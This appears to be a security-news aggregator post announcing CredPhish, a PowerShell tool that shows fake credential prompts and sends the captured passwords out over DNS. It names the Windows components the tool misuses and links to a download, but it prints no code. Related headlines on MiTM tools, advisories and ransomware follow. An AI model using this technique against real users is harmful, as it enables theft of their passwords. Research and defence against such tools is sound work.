CredPhish - A PowerShell Script Designed To Invoke Legitimate Credential Prompts And Exfiltrate Passwords Over DNS

CredPhish 1 credphish 752010

CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. It relies on CredentialPicker to collect user passwords, Resolve-DnsName for DNS exfiltration, and Windows Defender’s ConfigSecurityPolicy.exe to perform arbitrary GET requests.

For a walkthrough, see the Black Hills Infosec publication.

Download CredPhish

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Original Source

Tags: hacking, OSINT, Security, threatintel, tools

CredPhish – A PowerShell Script Designed To Invoke Legitimate Credential Prompts And Exfiltrate Passwords Over DNS

Original Source

Espionage – A Linux Packet Sniffing Suite For Automated MiTM Attacks

CISA: CISA Releases Eight Industrial Control Systems Advisories

Active Exploitation of Vulnerabilities in Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Products.

CACTUS Ransomware Victim: https://www[.]ghimli[.]com /

Cisco Products Multiple Vulnerabilities

Original Source

You may have missed

Espionage – A Linux Packet Sniffing Suite For Automated MiTM Attacks

CISA: CISA Releases Eight Industrial Control Systems Advisories

Active Exploitation of Vulnerabilities in Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Products.

CACTUS Ransomware Victim: https://www[.]ghimli[.]com /

Cisco Products Multiple Vulnerabilities